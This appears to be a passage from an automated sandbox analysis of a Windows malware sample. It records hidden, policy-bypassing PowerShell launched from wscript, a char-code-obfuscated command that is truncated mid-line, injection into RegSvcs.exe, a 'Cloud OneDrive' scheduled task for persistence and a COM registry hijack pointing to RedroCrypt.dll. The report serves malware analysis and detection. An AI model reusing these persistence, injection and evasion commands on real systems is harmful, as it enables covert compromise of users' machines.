        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe EIP: 1390000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe EIP: B70000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1390000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B70000
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.batJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /fJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /fJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[cJump to behavior
        Source: RegSvcs.exe, 0000000D.00000002.3433155350.0000000006F1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
